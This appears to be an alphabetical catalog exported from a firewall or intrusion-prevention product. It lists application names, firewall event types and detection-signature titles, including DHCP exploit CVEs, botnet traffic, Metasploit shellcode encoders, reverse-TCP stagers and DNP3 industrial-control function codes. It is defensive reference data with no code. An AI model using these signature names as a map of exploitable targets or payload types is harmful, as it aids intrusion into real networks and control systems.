Blackboard-Connect
BlackDuckSoftware
Blacklister-Allowed-A-Connection-From-Blacklister
Blacklister-Blacklist-Invalid-Command
Blacklister-Blacklister-Not-Allowed
Blacklister-Blacklisting-Connection-Closed
Blacklister-Blacklisting-Entries-Flushed
Blacklister-Blacklisting-Entry-Deleted
Blacklister-Blacklisting-Entry-Expired
Blacklister-Cant-Connect-To-Log-Server
Blacklister-Cant-Receive-A-Request
Blacklister-Cant-Send-A-Reply
Blacklister-Error-In-Receiving-From-Log-Server
Blacklister-Error-In-Sending-To-Log-Server
Blacklister-Invalid-Peer-Certificate
Blacklister-Invalid-Request
Blacklister-New-Blacklisting-Entry
Blacklister-Read-From-Persistent-Storage
Blacklister-Reply-Buffer-Is-Full
Blacklister-SSL-Handshake-Failed
Blacklister-Too-Many-Blacklisters
Blacklisting cancellation confirmation
Blacklisting cancellation request
Blacklisting cleaning confirmation
Blacklisting cleaning request
Blacklisting execution confirmation
Blacklisting failure
BlackPlanet
BlazeMeter
Blinksale
Blinkx
Blip.tv
Blizzard-Entertainment
Blizzard-World-of-Warcraft
Blockchain
Blockthrough
Blog Commenting
Blog Posting
Blog.com
Blogger
Bloglovin
Blogs and Personal Sites
Blokus
Bloomberg
Bloomfire
Blossom
Blower-for-Cisco
Blue-Cross-Blue-Shield
Blue-Jeans-Network
Blue-Link-ERP
Blue-Wave
BlueCamroo
BlueCoatSystems
BlueCross-BlueShield-of-Florida
Bluefolder
Blueforce
BlueHost
BlueKai
blueKiwi
Blueleaf
Bluemango-Zendesk
BlueTie
Blurb
BMC
BMC-TrueSight-Pulse
BNP-Paribas
BoardOnTrack
Bodet-software
Boingo-Wireless
Bomgar
Bond-us
Bonjour
bonpoo
Bontq
BookedIN
Bookeo
Booker
Bookfresh
Booking-Manager
Booking.com
BookingBug
Boomerang-for-Gmail
Boomi
Boomr-Mobile
BOOTP_CS-Bash-Shellshock-Code-Injection
BOOTP_CS-BOOTP-Daemon-Filename-Not-Terminated
BOOTP_CS-BOOTP-Daemon-Long-Filename-BOF
BOOTP_CS-Busybox-Project-Busybox-Udhcp-Option-Out-Of-Bounds-Read
BOOTP_CS-DHCP-BOOTREQUEST-Message
BOOTP_CS-Dhcpd-Packet-Size-Stack-Buffer-Overflow
BOOTP_CS-FreeBSD-Bootpd-Stack-Buffer-Overflow
BOOTP_CS-FreeRADIUS-FR_DHCP_attr2vp-Integer-Underflow-Out-Of-Bounds-Read
BOOTP_CS-ISC-DHCP-Buffer-Overflow
BOOTP_CS-ISC-DHCP-dhclient-Network-Configuration-Script-Command-Injection
BOOTP_CS-ISC-DHCP-dhclient-script-write-params-Buffer-Overflow
BOOTP_CS-ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service
BOOTP_CS-ISC-DHCP-Server-Dhcpoffer-Client-Identifier-Field-Denial-Of-Service-2
BOOTP_CS-Isc-DHCP-Server-Packet-Processing-Denial-Of-Service
BOOTP_CS-Isc-DHCP-Server-Zero-Length-Client-Id-Denial-Of-Service
BOOTP_CS-Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution
BOOTP_CS-Microsoft-Windows-DHCP-Client-Out-Of-Bounds-Read-CVE-2025-21179
BOOTP_CS-Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow
BOOTP_CS-Microsoft-Windows-DHCP-Server-Code-Execution-CVE-2019-0626
BOOTP_CS-Microsoft-Windows-DHCP-Server-Remote-Code-Execution
BOOTP_CS-Microsoft-Windows-DHCP-Server-UncodeOption-Heap-Buffer-Overflow-CVE-2019-0626
BOOTP_CS-Microsoft-Windows-NT-4.0-DHCP-Server-Buffer-Overflow
BOOTP_CS-Red-Hat-Networkmanager-DHCP-Command-Injection
BOOTP_CS-Sun-Solaris-DHCP-Client-Arbitrary-Code-Execution
BOOTP_CS-Sun-Solaris-in.dhcpd-Malformed-Packet
BOOTP_CS-Suspicious-Request
BOOTP_CS-Windows-ICS-DHCP-Buffer-Overflow-CVE-2023-38148
BOOTP_Daemon-Hardware-Address-Length-Overflow
BOOTP_Shared-Variables
BOOTP_SS-Microsoft-Windows-DHCP-Client-CVE-2019-0547-Code-Execution
BOOTP_SS-Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution
BOOTP_SS-Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow
Booz-Allen-Hamilton
Boscorporate
Boston-Mutual-Life-Insurance
Botnet-CnC-Traffic-Detected
Botnet-Fareit-Traffic-Detected
Botnet-Ghost-Traffic-Detected
Botnet-Kuluoz-Traffic-Detected
Botnet-Nitol-Traffic-Detected
Botnet-Palevo-Traffic-Detected
Botnet-Pramro-Traffic-Detected
Botnet-Pushdo-Traffic-Detected
Botnet-Ramnit-Traffic-Detected
Botnet-Sality_NonP2P-Traffic-Detected
Botnet-Sality_P2P-Traffic-Detected
Botnet-Smokeloader-Traffic-Detected
Botnet-Tofsee-Traffic-Detected
Botnet-Virut-Traffic-Detected
Botnet-Vobfus-Traffic-Detected
Botnet-Yoddos-Traffic-Detected
Botnet-Zeus_P2P-Traffic-Detected
Botnets
Bottomline
Boulevard-R
Bounce-Exchange
Box
Boxbe
Boxcar
Boxcryptor
Boxee
Boxever
BPMonline
Bradyplc
Brain-Cert
Brainlab
Brainloop
Brainpop
Brainshark
BrainShop
BrainStorm
Braintree
Brand24
BrandLocker
BrandMaker
Brands-of-the-World
Brandworkz
Bravurasolutions
breatheHR
Breezy-HR
Bremy
Brettspielwelt
BridgeTrack
BridgeWorks
Brightbox.co.uk
Brightcove
BrightEdge
Brightgen
Brightidea
BrightLine
BrightMove
Brightpearl
Brightpod
Brightree-LLC
BrightScope
BrightSolid
Brighttalk
Bristol-Online-Surveys
British-Standards-Institution
Brivo
Brix
Broadbean-Technology
Broadsoft
Broadspire
Brocade
Brokeroffice
Bronto
Brother-Online
Browsec
Browsera
BrowserShots
BrowserStack
BSNL
bswift
BT-Cloud
Bubbleshare
Bubbly
Budget-Your-Trip-Agent
Buffer
Bufferapp.com
Bug-Track
Bugaware
Bugcrowd
BugHerd
Bughost
Bugsnag
Bugtrack
Bugzilla
Build-it-Live
BuiltWith
BulkSMS
Bullhorn
Bullhorn-Reach
Buncee
Bungee
Bunker-App
Bureau-van-Dijk
Burning-glass
BurrellesLuce
Burst-SMS
Burstorm
Business and Economy
Business-Exchange
Business-Plan-Pro-Complete
Business-Plus-Accounting-Touch-Screen-Point-of-Sale
Business-Safety-Systems
Business-Wire
Businessolver
Buxfer
Buycraft
BuyDomains
buySAFE
BuySellAds
Buzzfeed
Buzznet
BuzzTouch
Bxp-software
Byallaccounts
BYOD-Portal
BypassThat
ByteDance
C2-Atom
CA Certificate warning
CA-Technologies
CA-UIM-Snap
CAcert
CacheFly
Cacoo
Cacti
Cadebill
Cadence
Cae
CafePress.com
CaGBC
CaiHong-Instant-Messaging
Cain-Travel
CakeHR
Cakemail
Calamari
Calibration-Control-(Ape-Software)
Call-Measurement
Callbright
CallFire
CallidusCloud
CallPro-CRM
CALUMO
Cambridge-Associates
Cambridgesoft
Camfrog-Video-Chat
Campaign-Manager
Campaign-Monitor
Campaigner
Campaignercrm
Campfire
Camstar
Canalplus
Candy-Crush
Candystand
Canonical
Canonical-Landscape
Canopus-EpaySuite
Canopy-Office
Canva
Canvas
Canvas-LMS
Canvas-Network
Capillary
Capita
Capital-Office-Products
Capital-One-360
Capital-One-Investing
Capital-Plus-Inc.
CapitalIQ
CapLinked
Capriccio-Fuzion
Capsulecrm
Capterra
Captoom
Carbonite
CardDAV
CardMunch
Care2-E-Mail
CareCloud
Career-Cruising
Career-Innovation-Zone
Careerassport
CareerBuilder
CarePilot
Caretime
Carlsonsw
Carrier-Access-Billing-System
Cart2Cart
Cartavi
Cartloom
Cas-pia
Cascade-HR
CaseFox
Casengo
CashBase
Cashboard
CashStar
Caspio
Cast-Iron-Live
Castlight
Casto-Travel
Catalogue-Manager
CatalystOne
Catch
Catchpoint
Catchup-Math
Cater2.me
Caterease
causeway
Cavium
Cayzu
CBS-Interactive
CBS-Video
Cbs.com
CCB
CCSO_Fingerprint-Test-1
CCSO_Fingerprint-Test-10
CCSO_Fingerprint-Test-11
CCSO_Fingerprint-Test-2
CCSO_Fingerprint-Test-3
CCSO_Fingerprint-Test-4
CCSO_Fingerprint-Test-5
CCSO_Fingerprint-Test-6
CCSO_Fingerprint-Test-7
CCSO_Fingerprint-Test-8
CCSO_Fingerprint-Test-9
CCSO_Mercury-Mail-Transport-System-Long-Command-BOF
CD-Messenger
CDC
CDN77
CDNetworks
Cdwg
CEB
Ceboa
Cegedim
CegidGroup
Celebros---Hosted-Solutions
Celoxis
Celtx
Cengage-Learning
Cenit
Centage
CenterBeam-Spam-Manager
Central-Desktop
Central-Information-Display
CentraStage
CENTRI-Technology
Centric-CRM
Centrify
CenturyLink
CenturyLink-Cloud
CEPREI-Certification-Body
Ceridian
Ceridian-Ereports
Cerner
Ceros
CertainSafe
Certes-Networks
Certificate-Revocation-List-Service
Certify
CEX.IO
Ceyoniq
Cezanne-HR
CFA-Institute
CFP-Board
Cgi-IRC
CGR
Cgsinc
ChamberMaster
Chango-publisher
Channel4
ChannelAdvisor
Channelchooser
ChannelInsight
ChannelReply
Channeltivity
Chaos-Video
ChargeDesk
Chargify
Chartbeat
Chartio
Chase
Chat-Avenue
Chat-Way
Chat-Web
Chatango
Chatbox
Chatforfree
ChatGPT
Chatroulette
ChatWork
Cheapair
Cheatmasters
Cheatscodesguides
CheckAppointments
CheckBox-Systems
Checkfront
CheckMarket
CheckPointSoftwareTechnologies
Checkster
Checkvist
CheddarGetter
Cheekyflirt
CHEP
Cheqbook-Accounting
Chess
Chikka-Messenger
Chillstep
Chilton-Investor-Portal
China-Proxy
Chinaren
Chinaren-Chat
Chinaren-Mail
Chinwag-Jobs
Chirbit
ChiroTouch
Choicelinx
Chrobrus
Chrome-Remote-Desktop
Chrome-River
ChromecastApp
Chrometa
Chronotek-Telephone-Timekeeping
Chunkhost
Churchteams
ChurchTrac
CIBC
Cielo
Cigna
Cignex
Cimatron
Cin7
Cincom
Cinemagram
Cintellate-EHandS-Software
CipherCloud
Circle
CircleCI
Circonus
Cirrus-Insight
Cisco
Cisco AnyConnect
Cisco-SMI
Cision
Citibank
Citizenserve
Citrix
Citrix GoToMeeting
Citrix-ICA
Citrix-Provisioning-Services
Citrix-ShareFile
Citrix-XML-Service
CityGrid-Media
Citysearch
CivicPlus
CiviCRM
CKBTravel
Clamav-Update-Service
Clarify-it
Clario
Claritum
Clarity
Clarizen
Claromentis
Classifieds Posting
ClassMarker
Classmates
Clavid
CLDAP
Cleanbill-liteBooks
Clear-View-System
Clearbooks-Accounting-Software
ClearC2
ClearCheckbook.com
ClearDay-Web
Cleardocs
Clearleap
Clearmanage
Clearpoint
Clearslide
Clearspider
ClearVantage
CLEO
Clever
Clever-Cloud
Click2Mail
Clickability
Clickable
ClickBook
Clickdesk
ClickMeeting
ClickSoftware
Clicksor
ClickSquared
ClickStreamTV
Clicktale
ClickThroo
Clicktime
Clicktools
Clicky
Client Protection Certificate Authority expires soon
Client Protection Certificate Authority has expired
Client Web Access HTTPS Certificate expires soon
Client Web Access HTTPS Certificate has expired
ClientSpot
Clinical-Trials-Management-System
Clinked
Clio
Clip2Net
ClipperCard
Clipular
clock.in
ClockIn-Portal
Clockspot
Cloob
Close.io
Cloud-66
Cloud-Aspects
Cloud-collaboration-spaces
Cloud-Guardian
Cloud-My-Office
Cloud-Plus
Cloud-Services-Depot
Cloud-Softphone
Cloud-Storage
Cloud-Testing
Cloud9-IDE
Cloud9-Realtime
Cloud9analytics
CloudA
Cloudability
Cloudacl
CloudAlly
Cloudant
Cloudapp
CloudatCost
Cloudbees
CloudBerry-Lab
Cloudbook
CloudCentral
CloudCMS
CloudCodes
CloudController
CloudConvert
CloudEntr
Cloudfinder
Cloudflare
CloudFuze
Cloudinary
CloudLock
CloudMagic
Cloudmark-Desktop
Cloudme
CloudMunch
Cloudon
CloudPassage
CloudPay
CloudPeople
CloudPointe
CloudRanger
Cloudsafe
Cloudscaling
CloudSDS
CloudSET
CloudShards
CloudShare
CloudSigma
Cloudsponge
CloudWare
CloudwareCity
Cloudwords
CloudWork
Cloudyn
Cloudzow
Club-Flyers
Club-Vps
Clubbox
ClustrMaps
Cmgl
CMO-HSE-Software
CMS2CMS
CNA
CNN
coAction.com
Coalfire
CobaltIron
CobaltPM
Cobot
CobWeb
Cocolog-Nifty
Code-Academy
Code-Climate
Code-School
Code42
Codeanywhere
Codebase
CodebaseHQ
Codentia
Codenvy
CodePlex
CodeProject
Cogentys
Coin-Cafe
Coinapult
Coinbase
Coinify
CoinJar
Coins-global
Coins.ph
CollabNet
Collaboration - Office
CollabSpot
Columbus
Columnit
Comarch-Loyalty-Management
Comcast-Webmail
Comcity
Comdata
Comeet
Cometdocs
Comindware-Project
CoMindWork
Comixology
Comm100
Commence-Online-CRM
CommerceHub
Commission-Junction
CommonOffice
Common_Generic-Shellcode-1
Common_Generic-Shellcode-2
Common_Generic-Shellcode-Encoder-1
Common_Generic-Shellcode-Encoder-2
Common_Generic-Shellcode-Encoder-3
Common_Generic-Shellcode-Encoder-4
Common_Generic-Shellcode-Encoder-5
Common_Generic-Shellcode-Encoder-6
Common_Generic-Shellcode-Encoder-7
Common_Metasploit-Payload-Windows-x64-Exec
Common_Metasploit-Payload-Windows-x64-Messagebox
Common_Metasploit-Payload-Windows-X86-Format-All-Drives
Common_Metasploit-Payload-Windows-X86-Messagebox
Common_Metasploit-Payload-Windows-X86-Shell-Bind-TCP-Xpfw
Common_Metasploit-Payload-Windows-X86-Speak-Pwned
Common_Metasploit-Shellcode-Java
Common_Metasploit-Shellcode-MIPS-Byte-Longxor
Common_Metasploit-Shellcode-MIPS-Byte-Xori
Common_Metasploit-Shellcode-x64-Xor-Context
Common_Metasploit-Shellcode-x64-Xor-Dynamic
Common_Metasploit-Shellcode-x64-Xor-Stub
Common_Metasploit-Shellcode-x64-Zutto-Dekiru
Common_Metasploit-Shellcode-x86-Add-Sub-Stub
Common_Metasploit-Shellcode-x86-Alpha-Mixed-Stub
Common_Metasploit-Shellcode-x86-Alpha-Upper-Stub
Common_Metasploit-Shellcode-x86-Avoid-Underscore-Stub
Common_Metasploit-Shellcode-x86-Avoid-Utf8-Tolower-Stub
Common_Metasploit-Shellcode-x86-Bloxor-Stub
Common_Metasploit-Shellcode-x86-BMP-Polyglot-Stub
Common_Metasploit-Shellcode-x86-Call4-Dword-Xor-Stub
Common_Metasploit-Shellcode-x86-Countdown-Stub
Common_Metasploit-Shellcode-x86-Fnstenv-Mov-Stub
Common_Metasploit-Shellcode-x86-Jmp-Call-Additive-Stub
Common_Metasploit-Shellcode-x86-NonAlpha-Stub
Common_Metasploit-Shellcode-x86-NonUpper-Stub
Common_Metasploit-Shellcode-x86-Opt-Sub-Stub
Common_Metasploit-Shellcode-x86-Service-Stub
Common_Metasploit-Shellcode-x86-Shikata-Ga-Nai-Stub
Common_Metasploit-Shellcode-x86-Single-Static-Bit-Stub
Common_Metasploit-Shellcode-x86-Unicode-Mixed-Stub
Common_Metasploit-Shellcode-x86-Unicode-Upper-Stub
Common_Metasploit-Shellcode-x86-Xor-Dynamic-Stub
Common_Metasploit-Stager-Linux-Armle-Bind-TCP
Common_Metasploit-Stager-Linux-Armle-Reverse-TCP
Common_Metasploit-Stager-Linux-x64-Bind-TCP
Common_Metasploit-Stager-Linux-x64-Reverse-TCP
Common_Metasploit-Stager-Linux-X86-Bind-Nonx-TCP
Common_Metasploit-Stager-Linux-X86-Bind-TCP
Common_Metasploit-Stager-Linux-X86-Find-Tag
Common_Metasploit-Stager-Linux-X86-Reverse-IPv6-TCP
Common_Metasploit-Stager-Linux-X86-Reverse-Nonx-TCP
Common_Metasploit-Stager-Linux-X86-Reverse-TCP
Common_Metasploit-Stager-Windows-x64-Block-API-Gen
Common_Metasploit-Stager-Windows-X86-Bind-Hidden-TCP
Common_Metasploit-Stager-Windows-X86-Bind-Nonx-TCP
Common_Metasploit-Stager-Windows-X86-Block-API-Gen
Common_Metasploit-Stager-Windows-X86-Findtag-Ord
Common_Metasploit-Stager-Windows-x86-Reverse-TCP-Ord
CommTrack
Communication-Tube
CommunityAmerica-Credit-Union
Commvault
Comodo Dragon
Comodo-BackUp
Comodo-OCSP
Comodo-ONE
CompanyCollege
CompanyPond
Compass
Compass-Learning-Odyssey
CompatTelRunner
Compete
Compgun
Compli
Compliance-Science---Personal-Trading-Control-Center
Compliance-Software-Solutions-Corporation
Compliance-Wire
CompliantPro
Component restarted on system resource failure.
Compose
Compromised Websites
CompStudy
Comptel
CompuCal-Calibration-Solutions
Computer Security
Computer-Guidance
Computershare
ComputerSupport
Compuware
CompXL
comScore
comScore-Sitestat
Concentsys
Conceptboard
ConceptFeedback
Conceptshare
ConcourseSuite
Concrete5
Concur-Expense-Management
Condeco-Software
Conductor
Conduit-Mobile
Conferencecalls.com
CONFORMiT
Conga-Composer
Conject
Connect2Field---Job-Management-Software
Connectandsell
Connection_Allowed
Connection_Application-Identified
Connection_Closed
Connection_Closed-Abnormally
Connection_Deep-Inspection-Off
Connection_Discarded
Connection_Failed
Connection_In-Capture-Mode
Connection_Interface_Changed
Connection_Progress
Connection_Protocol-Parameter-Error
Connection_Protocol-Parameter-Warning
Connection_Queued
Connection_Refused
Connection_Rematched
Connectria
ConnectWise Control
ConnectWise-PSA
Connexcs
Constant-Contact
Contact-Management
ContactAtOnce!
Contactchamp
ContactMonkey
Contactually
Contegix
Content Delivery Networks
Content-Grabber
Contentabc
Contentful
Continuity-Logic
Contract-Alert
ContractExpress.com
Contractpal
ContractWorks
ControlNow
Converge-Enterprise
ConvergeHub
Convergex
Conversant
Convert-XPS-to-PDF
Convertexperiments
Convertfiles
ConvertPDFtoWord
Conviva
Convo
Cookiebot
Cooks-Illustrated
Coolstreaming.it
CoorpAcademy
Copper-Egg
Copyscape
COR360
Coral-CDN
CoralTree
CordiantTechnologies
Core-Commissions
Corecon
Corefino
CoreMedia
Coremetrics-Analytics
Corent-SurPaaS
CorePlus
CORESense
Coreworx
Cornerstone
Corniche
Corporate-Perks
Corporate-Renaissance-Group
Corporation-Service-Company
Corptax
CorpTrav
Cortana
Cortera
Cosential
CoSign
Cosium
CosmoLex
Cost-Plus-World-Market
Costco-Photo-Center
Cotap
CoTweet-Enterprise
Coub
Couchsurfing
Cougarmtn
CounterPath
Coupa
Courion
Coursera
CourseSmart
Covad
Covendis
CoveritLive
Covisint-Corporation
Coworkers.com
Cox-Webmail
Coxito
Cozimo
cPanel
CPXinteractive-Advertisements-Service
Crackle
CradlePoint
Craigslist
Crashlytics
CrashPlan
CrashPlan
Crate
Crates.io
Crazy-Domains
Crazy-Egg
CrazyCall
Crealogix
Create-A-Forum
Creately
Credit-Karma
CreditSafe
Crelate-Talent
CRG-emPerform
CrispThinking
Criteo
Criteria-Corp
Criterion Channel
CritSend
Crittercism
CRMboost
CRMdesk
CRMnext
crocodoc
CrossBrowserTesting
CrossLoop
Crossroads
Crowdbase
Crowdbooster
Crowdcurity
Crowdflower
Crowdin
Crowdmap
CrowdProcess
Crowdspring
CrowdStrike
Crowdtorch
Crownpeak
CRS-On-Demand
Crucial
Crump-Life-Insurance
Crunch-Accounting---UK
CrunchBase
Cryptocat
Cryptzone
Crystal-and-Co
CS-VUE-Suite
CSB
Csc-Cloud
CSCampus-Dashboard
CSGInternational
Ctg
Cubby
Cube-Anywhere
CubeSocial
Cubetree
Cubilis
Cubrid
Cultural Institutions
Curbed
Curdbee/Hiveage
Curemd
Current-Analysis
Curse
CURTIS-Digital
CushyCMS
Custom-Encrypted Uploads
CustomCall-Webtop-BPM
Customer-Relationship-Management
Customer-Thermometer
Customer.io
CustomerGauge
CustomerSure
Cvent
cvMail
CVS
CVS-Photo
CVWarehouse
CWJobs---Recruiters
CX
Cxense
Cyanic-HSE
Cybage
CyberArk
CyberArk Endpoint Privilege Manager
CyberEars
CyberGrants
CyberSource-Business-Center
CyberU
Cyfe
Cyient
Cyphertite
Cypress-Semiconductor
Cyscape
Cyworld
D-Sight---Analyze
DaCast
Daegis
DailyBurn
Dailymile
Dailymotion
Daisygroupplc
DAKCS
Dameware-Mini-Remote-Control
Danaher
DanskeBank
Daptiv
DAQFactory
Dashlane
Dassault-Systemes
Data Provider Error
Data-BaGG
DataBliss
Databox
DataCare
Datacert
Datadeliver
DataDog
DataHero
Datalength-TCP_Poison-Ivy-Traffic
Datalength-TCP_Shared-Variables
Datalength-TCP_W32/Nuwar@mm-Encrypted-Traffic
Datalength-TCP_ZeroAccess-Traffic
Datalength-UDP_Gnu-C-Library-Getaddrinfo-Buffer-Overflow
Datalength-UDP_Long-SNMP-Request
Datalength-UDP_Long-Syslog-Message
Datalength-UDP_OpenVPN-P_Control-Denial-Of-Service
Datalength-UDP_Palevo
Datalength-UDP_Shared-Variables
Datalength-UDP_W32/Nuwar@mm-Encrypted-Traffic
Dataleveragegroup.com
Datalink
Datanyze
Datapac
Datapipe
Dataprise
Dataram
Datasift
Datatrans
Datawatch
Datawitness
Datawrapper
Datel
DATEV-eG
Daum
Daum-Blog
Daum-Mail
Daum-Mypeople
Day-Dots
DayClips-Office
Dayforce-HCM
Daylite-for-Mac
Dazhihui-Stockware
DBAPPSecurity
DBX
Dc-Inside
Deac
Deacom
Deal-Pack
Dealer-Specialties
Dealer.com
DealerOn
DealershipRater
DealerSocket
Dealertrack
DealExtreme
Dealio-Toolbar
Dealix-Dealer-Services
DEAN-Alert
DEAR-Inventory
Debt-Collections-Software
Debtor-Daddy
Debug_Message
Decibel-Insight
Decision-Support-Software
Deem
DeepSeek
Deezer
Defined-STEM
DEFT-Payment-Systems
Degoo
Degreed
Delcam
Delicious
Delighted
Deliverable blacklisting request
Dell-Online-Self-Dispatch
Delta-Dental-of-Washington
Delta-Skymiles
Demand-Solutions
Demandbase
Demonoid.com
Denon-Firmware-Update
Deploy-HQ
Deposco
Deposit-Files
Deputy
descartes
Design-On-Click
Designer-Pages
Desire2Learn
Deskaway
Deskera
Deskero
Deskmetrics
Desura
Deutsche-Post-DHL
DevGuard.com
Deviantart
DeviceCensus
DeviceDisplayObjectProvider
DEXMA-PLM
DHCP
DialogTech
Diamonds-Evolution
Diapers.com
Dice
DiCentral
DICOM
DIDWW
Die-Welt
DiffNow
Digg
Digi-International
DIGIcation
DigiCert
Digicert-Online-Certificate-Status-Service
Digidip
DigiMAINT
DIGIPASS-as-a-Service
Digital-Chalk
Digital-Invoicing
Digital-Realty
Digital-River
Digital-Waybill
Digitalbucket.net
Digitalocean
Digium
DigMyData
Digsby
Diigo
Diino
Diligent-Corporation
DimDim
Dimension-Data
Dimensional-Fund-Advisors
dimins
Diners-Club-USA
Diodeo
dionglobal
Diply
Direct2drive
DirectBuy
DirectConnect
Directiq
Directly
Directnic
DirectorsDesk
DirectVid
Discord
Discourse
Discover-Card
DiscoverOrg
Discovery-Benefits
Discovery-Education
Discoveryplus
Disney
Disney+
Dispop
Disqus
divassoftware
Divshare
Divvy-HQ
DLP_File-Allowed
DLP_File-Blocked
DLP_File-Too-Big
DLP_ICAP-Server-Down
DLP_ICAP-Server-Error
DLP_ICAP-Server-Incompatible
DLP_ICAP-Server-Up
DLP_No-ICAP-Server
DLP_Scanner-Error
dlsoftware
dlvr.it
Dmclient
DMV
DNAmail
DNAnexus
DnB
DnB-iUpdate
DNP3-TCP
DNP3-TCP-CRC-Invalid
DNP3-TCP-Invalid-Application-Layer-Control-Byte
DNP3-TCP-Invalid-Link-Layer-Control-Byte
DNP3-TCP-Parse-Error
DNP3-TCP-Reserved-Address
DNP3-TCP_Abort-File-Request
DNP3-TCP_Activate-Configuration-Request
DNP3-TCP_Assign-Class-Request
DNP3-TCP_Authenticate-File-Request
DNP3-TCP_Authenticate-Response
DNP3-TCP_Authentication-No-Ack-Request
DNP3-TCP_Authentication-Request
DNP3-TCP_Close-File-Request
DNP3-TCP_Cold-Restart-Request
DNP3-TCP_Confirm-Message
DNP3-TCP_Delay-Measurement-Request
DNP3-TCP_Delete-File-Request
DNP3-TCP_Direct-Operate-No-Ack-Request
DNP3-TCP_Direct-Operate-Request
DNP3-TCP_Disable-Unsolicited-Responses-Request
DNP3-TCP_Enable-Unsolicited-Responses-Request
DNP3-TCP_Freeze-And-Clear-No-Ack-Request
DNP3-TCP_Freeze-And-Clear-Request
DNP3-TCP_Freeze-At-Time-No-Ack-Request
DNP3-TCP_Freeze-At-Time-Request
DNP3-TCP_Get-File-Information-Request
DNP3-TCP_Immediate-Freeze-No-Ack-Request
DNP3-TCP_Immediate-Freeze-Request
DNP3-TCP_Initialize-Application-Request
DNP3-TCP_Initialize-Data-Request
DNP3-TCP_Link-Layer-Client-Ack
DNP3-TCP_Link-Layer-Client-Confirmed-User-Data
DNP3-TCP_Link-Layer-Client-Link-Status
DNP3-TCP_Link-Layer-Client-Nack
DNP3-TCP_Link-Layer-Client-Not-Supported
DNP3-TCP_Link-Layer-Client-Obsolete-Primary-Function-Code
DNP3-TCP_Link-Layer-Client-Obsolete-Secondary-Function-Code
DNP3-TCP_Link-Layer-Client-Request-Link-Status
DNP3-TCP_Link-Layer-Client-Reserved-Primary-Function-Code
DNP3-TCP_Link-Layer-Client-Reserved-Secondary-Function-Code
DNP3-TCP_Link-Layer-Client-Reset-Link-States
DNP3-TCP_Link-Layer-Client-Test-Link-States
DNP3-TCP_Link-Layer-Client-Unconfirmed-User-Data
DNP3-TCP_Link-Layer-Server-Ack
DNP3-TCP_Link-Layer-Server-Confirmed-User-Data
DNP3-TCP_Link-Layer-Server-Link-Status
DNP3-TCP_Link-Layer-Server-Nack
DNP3-TCP_Link-Layer-Server-Not-Supported
DNP3-TCP_Link-Layer-Server-Obsolete-Primary-Function-Code
DNP3-TCP_Link-Layer-Server-Obsolete-Secondary-Function-Code
DNP3-TCP_Link-Layer-Server-Request-Link-Status
DNP3-TCP_Link-Layer-Server-Reserved-Primary-Function-Code
DNP3-TCP_Link-Layer-Server-Reserved-Secondary-Function-Code
DNP3-TCP_Link-Layer-Server-Reset-Link-States
DNP3-TCP_Link-Layer-Server-Test-Link-States
DNP3-TCP_Link-Layer-Server-Unconfirmed-User-Data
DNP3-TCP_Open-File-Request
DNP3-TCP_Operate-Request
DNP3-TCP_Read-Request
DNP3-TCP_Record-Current-Time-Request
DNP3-TCP_Request-Reserved-Function-Code
DNP3-TCP_Response-Reserved-Function-Code
DNP3-TCP_Save-Configuration-Request
DNP3-TCP_Select-Request
DNP3-TCP_Solicited-Response
DNP3-TCP_Start-Application-Request
DNP3-TCP_Stop-Application-Request
DNP3-TCP_Unsolicited-Response
DNP3-TCP_Warm-Restart-Request
DNP3-TCP_Write-Request
DNP3-UDP
DNP3-UDP-CRC-Invalid
DNP3-UDP-Invalid-Application-Layer-Control-Byte
DNP3-UDP-Invalid-Link-Layer-Control-Byte
DNP3-UDP-Parse-Error
DNP3-UDP-Reserved-Address
DNP3-UDP_Abort-File-Request
DNP3-UDP_Activate-Configuration-Request
DNP3-UDP_Assign-Class-Request
DNP3-UDP_Authenticate-File-Request
DNP3-UDP_Authenticate-Response
DNP3-UDP_Authentication-No-Ack-Request
DNP3-UDP_Authentication-Request
DNP3-UDP_Close-File-Request
DNP3-UDP_Cold-Restart-Request
DNP3-UDP_Confirm-Message
DNP3-UDP_Delay-Measurement-Request
DNP3-UDP_Delete-File-Request
DNP3-UDP_Direct-Operate-No-Ack-Request
DNP3-UDP_Direct-Operate-Request
DNP3-UDP_Disable-Unsolicited-Responses-Request
DNP3-UDP_Enable-Unsolicited-Responses-Request
DNP3-UDP_Freeze-And-Clear-No-Ack-Request
DNP3-UDP_Freeze-And-Clear-Request
DNP3-UDP_Freeze-At-Time-No-Ack-Request
DNP3-UDP_Freeze-At-Time-Request
DNP3-UDP_Get-File-Information-Request
DNP3-UDP_Immediate-Freeze-No-Ack-Request
DNP3-UDP_Immediate-Freeze-Request
DNP3-UDP_Initialize-Application-Request
DNP3-UDP_Initialize-Data-Request
DNP3-UDP_Link-Layer-Client-Ack
DNP3-UDP_Link-Layer-Client-Confirmed-User-Data
DNP3-UDP_Link-Layer-Client-Link-Status
DNP3-UDP_Link-Layer-Client-Nack
DNP3-UDP_Link-Layer-Client-Not-Supported
DNP3-UDP_Link-Layer-Client-Obsolete-Primary-Function-Code
DNP3-UDP_Link-Layer-Client-Obsolete-Secondary-Function-Code
DNP3-UDP_Link-Layer-Client-Request-Link-Status
DNP3-UDP_Link-Layer-Client-Reserved-Primary-Function-Code
DNP3-UDP_Link-Layer-Client-Reserved-Secondary-Function-Code
DNP3-UDP_Link-Layer-Client-Reset-Link-States
DNP3-UDP_Link-Layer-Client-Test-Link-States
DNP3-UDP_Link-Layer-Client-Unconfirmed-User-Data
DNP3-UDP_Link-Layer-Server-Ack
DNP3-UDP_Link-Layer-Server-Confirmed-User-Data
DNP3-UDP_Link-Layer-Server-Link-Status
DNP3-UDP_Link-Layer-Server-Nack
DNP3-UDP_Link-Layer-Server-Not-Supported
DNP3-UDP_Link-Layer-Server-Obsolete-Primary-Function-Code
DNP3-UDP_Link-Layer-Server-Obsolete-Secondary-Function-Code
DNP3-UDP_Link-Layer-Server-Request-Link-Status
DNP3-UDP_Link-Layer-Server-Reserved-Primary-Function-Code
DNP3-UDP_Link-Layer-Server-Reserved-Secondary-Function-Code
DNP3-UDP_Link-Layer-Server-Reset-Link-States
DNP3-UDP_Link-Layer-Server-Test-Link-States
DNP3-UDP_Link-Layer-Server-Unconfirmed-User-Data
DNP3-UDP_Open-File-Request
DNP3-UDP_Operate-Request
DNP3-UDP_Read-Request
DNP3-UDP_Record-Current-Time-Request
